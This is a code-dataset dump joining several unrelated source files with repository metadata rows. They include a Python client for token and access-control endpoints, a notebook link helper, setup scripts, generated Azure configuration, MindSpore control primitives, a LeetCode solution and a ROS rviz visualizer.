        body = {'token': token}
        if server_token:
            body['server-token'] = server_token
        if request:
            body['request'] = self._as_list(request)
        return self.call("token/introspect", body)

    def revoke_tokens(self, tokens):
        return self.call("token/revoke", {'tokens': self._as_list(tokens)})

    def revoke_token_hashes(self, token_hashes):
        return self.call(
            "token/revoke", {'token-hashes': self._as_list(token_hashes)})

    def revoke_all(self, cert_serial, cert_fingerprint):
        body = {'serial': cert_serial, 'fingerprint': cert_fingerprint}
        return self.call("token/revoke-all", body)

    def audit_tokens(self, hours):
        return self.call("audit/tokens", {'hours': hours})

    def add_consumer_to_group(self, consumer, group, valid_till):
        body = {'consumer': consumer, 'group': group, 'valid-till': valid_till}
        return self.call("group/add", body)

    def delete_consumer_from_group(self, consumer, group):
        return self.call("group/delete", {'consumer': consumer, 'group': group})

    def list_group(self, consumer, group=None):
        body = {'consumer': consumer}
        if group:
            body['group'] = group
        return self.call("group/list", body)

    def provider_access(self, request, provider_email=None):
        # Acting as a delegate requires the provider-email header.
        header = {'provider-email': provider_email} if provider_email else {}
        return self.call("provider/access", request, "POST", {}, header)

    def delete_rule(self, request, provider_email=None):
        header = {'provider-email': provider_email} if provider_email else {}
        return self.call("provider/access", request, "DELETE", {}, header)

    def get_provider_access(self, provider_email=None):
        header = {'provider-email': provider_email} if provider_email else {}
        return self.call("provider/access", {}, "GET", {}, header)

    def organization_reg(self, org):
        return self.call("admin/organizations", {'organization': org})

    def get_provider_regs(self, filtr=None):
        return self.call(
            "admin/provider/registrations", {}, "GET", {"filter": filtr})

    def update_provider_status(self, uid, status):
        params = {"user_id": uid, "status": status}
        return self.call(
            "admin/provider/registrations/status", {}, "PUT", params)

    def get_delegate_providers(self):
        return self.call("delegate/providers", {}, "GET")
| 32.813953 | 104 | 0.428774 |
acdf8ebede86d5d74a571b3df4acda04b7f60341 | 1,117 | py | Python | open_in_colab_workflow/glob_links.py | fem-on-colab/open-in-colab-workflow | d5309ff527cbea8a536a8890c88a8cc39bdb8b3c | [
"MIT"
] | null | null | null | open_in_colab_workflow/glob_links.py | fem-on-colab/open-in-colab-workflow | d5309ff527cbea8a536a8890c88a8cc39bdb8b3c | [
"MIT"
] | null | null | null | open_in_colab_workflow/glob_links.py | fem-on-colab/open-in-colab-workflow | d5309ff527cbea8a536a8890c88a8cc39bdb8b3c | [
"MIT"
] | null | null | null | # Copyright (C) 2021-2022 by the FEM on Colab authors
#
# This file is part of FEM on Colab-related actions.
#
# SPDX-License-Identifier: MIT
"""Get links associated to every notebook in the work directory."""
import os
import typing
from open_in_colab_workflow.glob_files import glob_files
from open_in_colab_workflow.publish_on import PublishOnArtifact, PublishOnBaseClass, PublishOnDrive, PublishOnGitHub
def glob_links(work_dir: str, pattern: str, publish_on: PublishOnBaseClass) -> typing.Dict[str, typing.Optional[str]]:
    """Get links associated to every notebook matching a pattern in the work directory."""
    if isinstance(publish_on, PublishOnArtifact):
        # Artifacts need no link replacement.
        return {}
    if not isinstance(publish_on, (PublishOnDrive, PublishOnGitHub)):  # pragma: no cover
        raise RuntimeError("Invalid publish_on attribute")
    # Map each matching notebook to its published URL (path relative to work_dir).
    return {
        matched_file: publish_on.get_url(os.path.relpath(matched_file, work_dir))
        for matched_file in glob_files(work_dir, pattern)
    }
| 41.37037 | 118 | 0.749329 |
acdf8f4be86e11c777a760f3a7f649ac9e02d1fc | 428 | py | Python | setup.py | rubenhenares/qss-debugger | bef7659ad687ad07aa14734d416040bf6d72a0f3 | [
"Apache-2.0"
] | 1 | 2019-03-22T16:27:46.000Z | 2019-03-22T16:27:46.000Z | setup.py | rubenhenares/qss-debugger | bef7659ad687ad07aa14734d416040bf6d72a0f3 | [
"Apache-2.0"
] | null | null | null | setup.py | rubenhenares/qss-debugger | bef7659ad687ad07aa14734d416040bf6d72a0f3 | [
"Apache-2.0"
] | 1 | 2020-12-13T00:23:19.000Z | 2020-12-13T00:23:19.000Z | from setuptools import setup
# Distribution metadata for the qss_debugger package.
# NOTE(review): runtime deps ('future', 'Qt.py') are unpinned; consider
# version constraints before publishing a new release.
setup(
    name='qss_debugger',
    version='0.1.5',
    packages=['qss_debugger'],
    install_requires=['future', 'Qt.py'],
    url='https://github.com/rubenhenares/qss_debugger',
    license='Apache License 2.0',
    author='Ruben Henares',
    author_email='ruben@404fs.com',
    description='Improves the process of styling Qt applications with qss.',
    keywords=['qt', 'styling', 'qss']
)
| 26.75 | 76 | 0.670561 |
acdf8f872303f5a5aa5a115c55fe36e8a3ff52b8 | 2,122 | py | Python | test/vanilla/Expected/AcceptanceTests/Xml/xmlservice/_configuration.py | Azure/autorest.azure-functions-python | b0896d8aec6b0fd6f0bcb12ea8e0489652dc2783 | [
"MIT"
] | 4 | 2020-10-22T20:35:38.000Z | 2021-12-21T07:29:01.000Z | test/vanilla/Expected/AcceptanceTests/Xml/xmlservice/_configuration.py | Azure/autorest.azure-functions-python | b0896d8aec6b0fd6f0bcb12ea8e0489652dc2783 | [
"MIT"
] | 3 | 2020-09-09T15:16:15.000Z | 2021-12-20T15:25:18.000Z | test/vanilla/Expected/AcceptanceTests/Xml/xmlservice/_configuration.py | Azure/autorest.azure-functions-python | b0896d8aec6b0fd6f0bcb12ea8e0489652dc2783 | [
"MIT"
] | 2 | 2020-11-10T07:16:23.000Z | 2020-12-30T11:03:14.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from ._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any
class AutoRestSwaggerBATXMLServiceConfiguration(Configuration):
"""Configuration for AutoRestSwaggerBATXMLService.
Note that all parameters used to create this instance are saved as instance
attributes.
"""
def __init__(
self,
**kwargs # type: Any
):
# type: (...) -> None
super(AutoRestSwaggerBATXMLServiceConfiguration, self).__init__(**kwargs)
kwargs.setdefault('sdk_moniker', 'autorestswaggerbatxmlservice/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs # type: Any
):
# type: (...) -> None
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.RetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.RedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
| 41.607843 | 106 | 0.671065 |
acdf8fc843b536931739bc551f00e5745e8f9fed | 256 | py | Python | 96-Unique-Binary-Search-Trees/solution.py | alfmunny/leetcode | e35d2164c7e6e66410309fe1667ceab5a7689bef | [
"MIT"
] | null | null | null | 96-Unique-Binary-Search-Trees/solution.py | alfmunny/leetcode | e35d2164c7e6e66410309fe1667ceab5a7689bef | [
"MIT"
] | null | null | null | 96-Unique-Binary-Search-Trees/solution.py | alfmunny/leetcode | e35d2164c7e6e66410309fe1667ceab5a7689bef | [
"MIT"
class Solution:
    def numTrees(self, n):
        """Count structurally unique BSTs on n nodes (Catalan-number DP)."""
        if n < 1:
            return 0
        # counts[k] = number of unique BSTs with k nodes; counts[0] = 1 (empty tree).
        counts = [1] + [0] * n
        for total in range(1, n + 1):
            # Each choice of root splits the remaining nodes left/right.
            counts[total] = sum(
                counts[left] * counts[total - 1 - left] for left in range(total)
            )
        return counts[n]
| 18.285714 | 40 | 0.375 |
acdf8ff54847236cdf82d91e6a66144a68acc433 | 6,899 | py | Python | mindspore/ops/operations/control_ops.py | dongkcs/mindspore | cd7df6dbf463ff3128e9181e9d0c779cecb81320 | [
"Apache-2.0"
] | 2 | 2020-11-23T13:46:37.000Z | 2020-12-20T02:02:38.000Z | mindspore/ops/operations/control_ops.py | dongkcs/mindspore | cd7df6dbf463ff3128e9181e9d0c779cecb81320 | [
"Apache-2.0"
] | null | null | null | mindspore/ops/operations/control_ops.py | dongkcs/mindspore | cd7df6dbf463ff3128e9181e9d0c779cecb81320 | [
"Apache-2.0"
] | 1 | 2021-01-01T08:35:01.000Z | 2021-01-01T08:35:01.000Z | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""control_ops"""
from ...common import dtype as mstype
from ..._checkparam import Validator as validator
from ..._checkparam import Rel
from ..primitive import Primitive, PrimitiveWithInfer, prim_attr_register
class ControlDepend(Primitive):
    """
    Adds control dependency relation between source and destination operation.
    In many cases, we need to control the execution order of operations. ControlDepend is designed for this.
    ControlDepend will instruct the execution engine to run the operations in a specific order. ControlDepend
    tells the engine that the destination operations must depend on the source operation which means the source
    operations must be executed before the destination.
    Note:
        This operation does not work in `PYNATIVE_MODE`.
    Args:
        depend_mode (int): Use 0 for a normal dependency relation. Use 1 to depend on operations which use Parameter
            as their input. Default: 0.
    Inputs:
        - **src** (Any) - The source input. It can be a tuple of operations output or a single operation output. We do
          not concern about the input data, but concern about the operation that generates the input data.
          If `depend_mode` is 1 and the source input is Parameter, we will try to find the operations that
          used the parameter as input.
        - **dst** (Any) - The destination input. It can be a tuple of operations output or a single operation output.
          We do not concern about the input data, but concern about the operation that generates the input data.
          If `depend_mode` is 1 and the source input is Parameter, we will try to find the operations that
          used the parameter as input.
    Outputs:
        Bool. This operation has no actual data output, it will be used to setup the order of relative operations.
    Examples:
        >>> class Net(nn.Cell):
        >>>     def __init__(self):
        >>>         super(Net, self).__init__()
        >>>         self.control_depend = P.ControlDepend()
        >>>         self.softmax = P.Softmax()
        >>>
        >>>     def construct(self, x, y):
        >>>         mul = x * y
        >>>         softmax = self.softmax(x)
        >>>         ret = self.control_depend(mul, softmax)
        >>>         return ret
        >>> x = Tensor(np.ones([4, 5]), dtype=mindspore.float32)
        >>> y = Tensor(np.ones([4, 5]), dtype=mindspore.float32)
        >>> net = Net()
        >>> output = net(x, y)
    """
    @prim_attr_register
    def __init__(self, depend_mode=0):
        """init"""
        # depend_mode must be 0 or 1, inclusive (see class docstring).
        validator.check_int_range(depend_mode, 0, 1, Rel.INC_BOTH, "depend_mode", self.name)
    def __call__(self, src, dst):
        # Pass `src` through unchanged; the dependency edge itself is
        # consumed by the graph engine, not computed here.
        return src
class GeSwitch(PrimitiveWithInfer):
    """
    Adds control switch to data.

    Switch data flows into false or true branch depending on the condition. If the condition is true,
    the true branch will be activated, or vice versa.

    Inputs:
        - **data** (Union[Tensor, Number]) - The data to be used for switch control.
        - **pred** (Tensor) - It must be a scalar whose type is bool and shape is `()`, It is used as condition for
          switch control.
    Outputs:
        tuple. Output is tuple(false_output, true_output). The Elements in the tuple has the same shape of input data.
        The false_output connects with the false_branch and the true_output connects with the true_branch.

    Examples:
        >>> class Net(nn.Cell):
        >>>     def __init__(self):
        >>>         super(Net, self).__init__()
        >>>         self.square = P.Square()
        >>>         self.add = P.TensorAdd()
        >>>         self.value = Tensor(np.full((1), 3), mindspore.float32)
        >>>         self.switch = P.GeSwitch()
        >>>         self.merge = P.Merge()
        >>>         self.less = P.Less()
        >>>
        >>>     def construct(self, x, y):
        >>>         cond = self.less(x, y)
        >>>         st1, sf1 = self.switch(x, cond)
        >>>         st2, sf2 = self.switch(y, cond)
        >>>         add_ret = self.add(st1, st2)
        >>>         st3, sf3 = self.switch(self.value, cond)
        >>>         sq_ret = self.square(sf3)
        >>>         ret = self.merge((add_ret, sq_ret))
        >>>         return ret[0]
        >>>
        >>> x = Tensor(10.0, dtype=mindspore.float32)
        >>> y = Tensor(5.0, dtype=mindspore.float32)
        >>> net = Net()
        >>> output = net(x, y)
    """
    @prim_attr_register
    def __init__(self):
        """init"""
    def __call__(self, data, pred):
        # Graph-mode only primitive: there is no eager (Python-level) implementation.
        raise NotImplementedError
    def infer_shape(self, data, pred):
        # `pred` must be a scalar (rank 0); both branches keep the input's shape.
        validator.check_equal_int(len(pred), 0, "pred rank", self.name)
        return (data, data)
    def infer_dtype(self, data_type, pred_type):
        # `data` may be a tensor or a plain number; the predicate must be a bool tensor.
        validator.check_subclass(
            "data", data_type, (mstype.tensor,) + mstype.number_type, self.name)
        validator.check_tensor_type_same(
            {"pred": pred_type}, [mstype.bool_], self.name)
        return (data_type, data_type)
class Merge(PrimitiveWithInfer):
    """
    Merges all input data to one.

    Exactly one of the inputs is selected and forwarded as the output.

    Inputs:
        - **inputs** (Union(Tuple, List)) - The data to be merged. All tuple elements must have the same data type.

    Outputs:
        tuple. Output is tuple(`data`, `output_index`). The `data` has the same shape of `inputs` element.

    Examples:
        >>> merge = P.Merge()
        >>> input_x = Tensor(np.linspace(0, 8, 8).reshape(2, 4), mindspore.float32)
        >>> input_y = Tensor(np.random.randint(-4, 4, (2, 4)), mindspore.float32)
        >>> result = merge((input_x, input_y))
    """
    @prim_attr_register
    def __init__(self):
        """init"""
    def __call__(self, *args):
        # Graph-mode only primitive: no eager (Python-level) implementation.
        raise NotImplementedError
    def infer_shape(self, inputs):
        # The merged data keeps the shape of the first branch; the selected
        # branch index is a single scalar value (shape [1]).
        return (inputs[0], [1])
    def infer_dtype(self, inputs):
        # Every branch must carry the same scalar/tensor type (bool or numeric).
        args = {'inputs[%d]' % idx: branch_type for idx, branch_type in enumerate(inputs)}
        validator.check_scalar_or_tensor_type_same(args, (mstype.bool_,) + mstype.number_type, self.name)
        return (inputs[0], mstype.int32)
| 39.198864 | 119 | 0.610233 |
acdf9006e7c416286a25c22dcfbf4bc60872a84b | 13,299 | py | Python | scripts/spatial_concepts_visualizer.py | Shoichi-Hasegawa0628/spconavi_ros | 8b627ac7a85e358d5ef921f0345ffbcdef0be63f | [
"MIT"
] | null | null | null | scripts/spatial_concepts_visualizer.py | Shoichi-Hasegawa0628/spconavi_ros | 8b627ac7a85e358d5ef921f0345ffbcdef0be63f | [
"MIT"
] | null | null | null | scripts/spatial_concepts_visualizer.py | Shoichi-Hasegawa0628/spconavi_ros | 8b627ac7a85e358d5ef921f0345ffbcdef0be63f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# 学習した場所領域のサンプルをrviz上に可視化するプログラム
# 標準ライブラリ
import math
import sys
# サードパーティー
import rospy
import geometry_msgs.msg as gm
from geometry_msgs.msg import Point
import sensor_msgs.msg as sm
from visualization_msgs.msg import Marker
from visualization_msgs.msg import MarkerArray
import numpy as np
sys.path.append("lib/")
# 自作ライブラリ
from __init__ import *
# 自作ファイル
# import file_read as f_r
# from SBP import read_result
# Get the experiment name (trialname) from the ROS parameter server.
# trialname = sys.argv[1]
trialname = rospy.get_param('trialname')
print trialname
# Get the learning iteration index.
# iteration = sys.argv[2] #1
iteration = rospy.get_param('iteration')
# Get the sample index.
# sample = sys.argv[3] #0
sample = rospy.get_param('sample')
##FullPath of folder
# NOTE: outputfolder_SIG and navigation_folder come from `from __init__ import *`
# (local lib/ package) -- not visible in this file.
filename = outputfolder_SIG + trialname # + "/"
print filename, iteration, sample
outputfile = filename + navigation_folder # outputfolder + trialname + navigation_folder
# outputname = outputfile + "T"+str(T_horizon)+"N"+str(N_best)+"A"+str(Approx)+"S"+str(init_position_num)+"G"+str(speech_num)
maxparticle = 0
i = 0
##Load the maximum-likelihood particle at datafolder+trialname+"/"+step (currently disabled).
# for line in open( filename + 'weights.csv', 'r'):
# #itemList = line[:].split(',')
# if (i == 0):
# maxparticle = int(line)
# i +=1
# maxparticle = int(sys.argv[3])
# filename=sys.argv[1]
# Class_NUM=0#read_result(filename)
RAD_90 = math.radians(90)
color_all = 1 # 1 or 0 (if 0, every marker is drawn in red)
mu_draw = 1 # 1 or 0 (if 0, the distribution means are not drawn)
sigma_draw = 1 # 1 or 0 (if 0, the covariance ellipses are not drawn)
mu_arrow = 0 # set to 1 to visualize the means as arrows
# RGB color table for up to 100 spatial-concept classes (indices 50-99 repeat
# indices 0-49).  Each entry is an [r, g, b] triple with channels in [0, 1].
# BUG FIX: entry 65 was "[0, 7, 0.2, 0.1]" -- a four-element list caused by a
# decimal point typed as a comma; restored to [0.7, 0.2, 0.1] so it matches the
# mirrored entry at index 15 and keeps marker.color assignments in range.
COLOR = [
    [1, 0, 0], [0, 1, 0], [0, 0, 1], [0.5, 0.5, 0], [0.5, 0, 0.5],  # 4
    [0, 0.5, 0.5], [0.8, 0.1, 0.1], [0.1, 0.8, 0.1], [0.1, 0.1, 0.8], [0.6, 0.2, 0.2],  # 9
    [0.2, 0.6, 0.2], [0.2, 0.2, 0.6], [0.4, 0.3, 0.3], [0.3, 0.4, 0.3], [0.3, 0.3, 0.4],  # 14
    [0.7, 0.2, 0.1], [0.7, 0.1, 0.2], [0.2, 0.7, 0.1], [0.1, 0.7, 0.2], [0.2, 0.1, 0.7],  # 19
    [0.1, 0.2, 0.7], [0.5, 0.2, 0.3], [0.5, 0.3, 0.2], [0.3, 0.5, 0.2], [0.2, 0.5, 0.3],  # 24
    [0.3, 0.2, 0.5], [0.2, 0.3, 0.5], [0.7, 0.15, 0.15], [0.15, 0.7, 0.15], [0.15, 0.15, 0.7],  # 29
    [0.6, 0.3, 0.1], [0.6, 0.1, 0.3], [0.1, 0.6, 0.3], [0.3, 0.6, 0.1], [0.3, 0.1, 0.6],  # 34
    [0.1, 0.3, 0.6], [0.8, 0.2, 0], [0.8, 0, 0.2], [0.2, 0.8, 0], [0, 0.8, 0.2],  # 39
    [0.2, 0, 0.8], [0, 0.2, 0.8], [0.7, 0.3, 0], [0.7, 0, 0.3], [0.3, 0.7, 0.0],  # 44
    [0.3, 0, 0.7], [0, 0.7, 0.3], [0, 0.3, 0.7], [0.25, 0.25, 0.5], [0.25, 0.5, 0.25],  # 49
    [1, 0, 0], [0, 1, 0], [0, 0, 1], [0.5, 0.5, 0], [0.5, 0, 0.5],  # 54
    [0, 0.5, 0.5], [0.8, 0.1, 0.1], [0.1, 0.8, 0.1], [0.1, 0.1, 0.8], [0.6, 0.2, 0.2],  # 59
    [0.2, 0.6, 0.2], [0.2, 0.2, 0.6], [0.4, 0.3, 0.3], [0.3, 0.4, 0.3], [0.3, 0.3, 0.4],  # 64
    [0.7, 0.2, 0.1], [0.7, 0.1, 0.2], [0.2, 0.7, 0.1], [0.1, 0.7, 0.2], [0.2, 0.1, 0.7],  # 69
    [0.1, 0.2, 0.7], [0.5, 0.2, 0.3], [0.5, 0.3, 0.2], [0.3, 0.5, 0.2], [0.2, 0.5, 0.3],  # 74
    [0.3, 0.2, 0.5], [0.2, 0.3, 0.5], [0.7, 0.15, 0.15], [0.15, 0.7, 0.15], [0.15, 0.15, 0.7],  # 79
    [0.6, 0.3, 0.1], [0.6, 0.1, 0.3], [0.1, 0.6, 0.3], [0.3, 0.6, 0.1], [0.3, 0.1, 0.6],  # 84
    [0.1, 0.3, 0.6], [0.8, 0.2, 0], [0.8, 0, 0.2], [0.2, 0.8, 0], [0, 0.8, 0.2],  # 89
    [0.2, 0, 0.8], [0, 0.2, 0.8], [0.7, 0.3, 0], [0.7, 0, 0.3], [0.3, 0.7, 0.0],  # 94
    [0.3, 0, 0.7], [0, 0.7, 0.3], [0, 0.3, 0.7], [0.25, 0.25, 0.5], [0.25, 0.5, 0.25]  # 99
]
# When you want to draw only the Gaussian of one specific class index.
try:
    Number = None # int(sys.argv[3])
except IndexError:
    Number = None
# NOTE(review): with int(sys.argv[3]) commented out, this try/except is
# vestigial -- Number is always None, i.e. every class is drawn.
# Ishibushi-san keeps the hyperparameter values in "パラメータ.txt", hence the
# (disabled) loading code below.
# env_para=np.genfromtxt(filename+"/パラメータ.txt",dtype= None,delimiter =" ")
# Class_NUM=int(env_para[4][1])
class SpatialConceptsVisualizer():
    """Publishes the learned spatial-concept Gaussians as rviz MarkerArray.

    Reads the per-class means (mu) and covariances (sigma) produced by the
    learning step from CSV files under the module-level `filename` folder and
    publishes one covariance cylinder and/or one mean marker per class on the
    'draw_space' topic until ROS shuts down.

    NOTE(review): the methods rely on module-level globals (trialname,
    iteration, sample, filename, COLOR, the draw flags, ...) set at import
    time from ROS parameters.
    """
    def __init__(self):
        pass
    """
    def read_result(self, filename):
        file_dir = os.chdir(filename)
        f = open('SBP.txt')
        line = f.readline() # 1行を文字列として読み込む(改行文字も含まれる)
        place_num = int(line)
        return place_num
    """
    def mu_read(self, filename):
        """Read the Gaussian means from <trialname>_Myu_<iteration>_<sample>.csv.

        Returns (all_mu, K) where all_mu is a list of [x, y, 0, 0] entries
        (the sin/cos slots are zeroed out) and K is the number of classes read.
        NOTE: the `filename` parameter shadows the module-level global of the
        same name; callers here pass that global anyway.
        """
        all_mu = []
        # fp = open(filename+'mu'+maxparticle+".csv", "r") # check
        # convert = lambda text: int(text) if text.isdigit() else text
        # alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
        # file.sort(key=alphanum_key)
        # for f in file:
        K = 0
        for line in open(filename + "/" + trialname + '_Myu_' + str(iteration) + '_' + str(sample) + '.csv',
                         'r'): # .readlines()
            mu = [] # (x,y,sin,cos)
            # readlines() reads the whole file and processes it one line at a time
            # print line
            data = line[:].split(',')
            mu += [float(data[0])]
            mu += [float(data[1])]
            mu += [0] # float(data[2])]
            mu += [0] # float(data[3])]
            # print position
            all_mu.append(mu)
            K += 1
        return all_mu, K
    def sigma_read(self, filename):
        """Read the per-class covariances from <trialname>_S_<iteration>_<sample>.csv.

        Each CSV row holds the 2x2 planar covariance (row-major); it is padded
        to a 4x4 matrix with zero rows/columns for the unused sin/cos slots.
        """
        all_sigma = []
        # file = glob.glob(filename+'/parameter3/sigma/*.txt') # check
        # convert = lambda text: int(text) if text.isdigit() else text
        # alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
        # file.sort(key=alphanum_key)
        for line in open(filename + "/" + trialname + '_S_' + str(iteration) + '_' + str(sample) + '.csv', 'r'):
            # sigma=[] #(x,y,sin,cos)
            data = line[:].split(',')
            sigma = [[float(data[0]), float(data[1]), 0, 0], [float(data[2]), float(data[3]), 0, 0], [0, 0, 0, 0],
                     [0, 0, 0, 0]]
            # readlines() reads the whole file and processes it one line at a time
            # line=open(f, 'r').readlines()
            # i = 0
            # for l in line:
            # sigma_l.append(float(data[0]))
            # sigma_l.append(float(data[1]))
            # sigma_l.append(float(data[2]))
            # sigma_l.append(float(data[3]))
            #
            # sigma.append(sigma_l)
            #
            all_sigma.append(sigma)
        return all_sigma
    """
    def sampling_read(self, filename, class_num):
        c_all_position=[]
        for c in range(class_num):
            all_position=[] #すべての自己位置データのリスト
            file = glob.glob(filename+'/sampling_data3/class'+repr(c)+'/*.txt') # check
            convert = lambda text: int(text) if text.isdigit() else text
            alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
            file.sort(key=alphanum_key)
            #print file
            for f in file:
                position=[] #(x,y,sin,cos)
                line=open(f, 'r').readlines()
                #print line
                data=line[0][:].split(',')
                position +=[float(data[0])]
                position +=[float(data[1])]
                position +=[float(data[2])]
                position +=[float(data[3])]
                #print position
                all_position.append(position)
            c_all_position.append(all_position)
        return c_all_position
    """
    """
    #=============各場所領域に割り当てられているデータの読みこみ===================
    def class_check(self):
        Class_list=[]
        for i in range(Class_NUM):
            #f=filename+"/parameter3/class/class"+repr(i)+".txt" # check
            data=[]
            # default(エラー)
            #for line in open(f,'r').readlines():
            # print str(line) + "\n\n"
            # data.append(int(line))
            #for line in open(f, 'r'):
            # print "読み込み完了"
            #replaceを使えば簡単にできる
            #line1=line.split('[') # 始めの"["を除く
            #line1=line1[1].split(']') # 終わりの"["を除く
            #line2=line1[0]
            #print "\nline2:" + str(line2) + "\n"
            # 場所クラスに中身があるときはtry、中身がないときはexceptに移動
            #try:
            # data = [int(item) for item in line2.split(',')]
            #except ValueError:
            # data = []
            #c=[]
            #for item in data:
            # print item
            # try:
            # num=int(item)
            # c.append(num)
            # except ValueError:
            # pass
            Class_list.append(data)
        return Class_list
    """
    def place_draw(self):
        """Build one marker per class and publish the MarkerArray at 10 Hz forever."""
        # Skip classes that have no assigned data -> with the CRP there is no unassigned data
        # class_list=class_check()
        # print class_list
        pub = rospy.Publisher('draw_space', MarkerArray, queue_size=10)
        rospy.init_node('draw_spatial_concepts', anonymous=True)
        rate = rospy.Rate(10) # 10hz
        # Load mu and sigma of the maximum-likelihood particle.
        mu_all, Class_NUM = self.mu_read(filename)
        sigma = self.sigma_read(filename)
        # sample = sampling_read(filename, Class_NUM)
        # print "sigma: ",sigma
        data_class = [i for i in xrange(Class_NUM)]
        # for n in range(Class_NUM):
        # #if len(class_list[n])!=0:
        # data_class.append(n)
        marker_array = MarkerArray()
        id = 0  # NOTE: shadows the builtin `id`; used as a running marker id
        for c in data_class:
            # When drawing the center of each spatial region.
            # === Visualization of the extent of each spatial region ====================
            if sigma_draw == 1:
                marker = Marker()
                marker.type = Marker.CYLINDER
                # Ellipse from the covariance: axis lengths 2*sqrt(eigenvalue),
                # rotated to the first eigenvector's direction.
                # NOTE(review): np.linalg.eig does not guarantee eigenvalue order;
                # indices 0/1 are assumed to be the planar components -- verify.
                (eigValues, eigVectors) = np.linalg.eig(sigma[c])
                angle = (math.atan2(eigVectors[1, 0], eigVectors[0, 0]))
                marker.scale.x = 2 * math.sqrt(eigValues[0])
                marker.scale.y = 2 * math.sqrt(eigValues[1])
                marker.pose.orientation.w = math.cos(angle * 0.5)
                marker.pose.orientation.z = math.sin(angle * 0.5)
                marker.scale.z = 0.01 # default: 0.05
                marker.color.a = 0.3
                marker.header.frame_id = 'map'
                marker.header.stamp = rospy.get_rostime()
                marker.id = id
                id += 1
                marker.action = Marker.ADD
                marker.pose.position.x = mu_all[c][0]
                marker.pose.position.y = mu_all[c][1]
                marker.color.r = COLOR[c][0] # default: COLOR[c][0] (widen the color variation)
                marker.color.g = COLOR[c][1] # default: COLOR[c][1] (widen the color variation)
                marker.color.b = COLOR[c][2] # default: COLOR[c][2] (widen the color variation)
                if Number != None:
                    if Number == c:
                        marker_array.markers.append(marker)
                else:
                    marker_array.markers.append(marker)
            if mu_draw == 1:
                mu_marker = Marker()
                if mu_arrow == 1: # when visualizing the means as arrows
                    mu_marker.type = Marker.ARROW
                    orient_cos = mu_all[c][3]
                    orient_sin = mu_all[c][2]
                    if orient_sin > 1.0:
                        orient_sin = 1.0
                    elif orient_sin < -1.0:
                        orient_sin = -1.0
                    # Derive the heading (radian) from the sin/cos components.
                    radian = math.asin(orient_sin)
                    if orient_sin > 0 and orient_cos < 0:
                        radian = radian + RAD_90
                    elif orient_sin < 0 and orient_cos < 0:
                        radian = radian - RAD_90
                    mu_marker.pose.orientation.z = math.sin(radian / 2.0)
                    mu_marker.pose.orientation.w = math.cos(radian / 2.0)
                    # <<<<<<< arrow size settings >>>>>>>>>>>>>>>>>>>>>>>>
                    mu_marker.scale.x = 0.5 # default: 0.4
                    mu_marker.scale.y = 0.07 # default: 0.1
                    mu_marker.scale.z = 0.001 # default: 1.0
                    mu_marker.color.a = 1.0
                elif mu_arrow == 0:
                    mu_marker.type = Marker.SPHERE
                    mu_marker.scale.x = 0.1
                    mu_marker.scale.y = 0.1
                    mu_marker.scale.z = 0.01 # default: 0.05
                    mu_marker.color.a = 1.0
                mu_marker.header.frame_id = 'map'
                mu_marker.header.stamp = rospy.get_rostime()
                mu_marker.id = id
                id += 1
                mu_marker.action = Marker.ADD
                mu_marker.pose.position.x = mu_all[c][0]
                mu_marker.pose.position.y = mu_all[c][1]
                # print c,mu_marker.pose.position.x,mu_marker.pose.position.y
                if color_all == 1:
                    mu_marker.color.r = COLOR[c][0] # default: COLOR[c][0]
                    mu_marker.color.g = COLOR[c][1] # default: COLOR[c][1]
                    mu_marker.color.b = COLOR[c][2] # default: COLOR[c][2]
                elif color_all == 0:
                    mu_marker.color.r = 1.0
                    mu_marker.color.g = 0
                    mu_marker.color.b = 0
                if Number != None:
                    if Number == c:
                        marker_array.markers.append(mu_marker)
                else:
                    marker_array.markers.append(mu_marker)
        print marker_array.markers
        while not rospy.is_shutdown():
            # pub.publish(marker)
            pub.publish(marker_array)
            rate.sleep()
if __name__ == '__main__':
    # Entry point: build the visualizer and publish markers until ROS shuts down.
    node = SpatialConceptsVisualizer()
    try:
        node.place_draw()
    except rospy.ROSInterruptException:
        pass
acdf901ed89364049fe0a8e11c7d4edc8b442f28 | 5,525 | py | Python | oneflow/python/test/onnx/nodes/test_math.py | xxg1413/oneflow | f2e3c85a25b8aecfb6c0c0af1737833b1a77e135 | [
"Apache-2.0"
] | 1 | 2020-12-04T03:06:16.000Z | 2020-12-04T03:06:16.000Z | oneflow/python/test/onnx/nodes/test_math.py | xxg1413/oneflow | f2e3c85a25b8aecfb6c0c0af1737833b1a77e135 | [
"Apache-2.0"
] | null | null | null | oneflow/python/test/onnx/nodes/test_math.py | xxg1413/oneflow | f2e3c85a25b8aecfb6c0c0af1737833b1a77e135 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
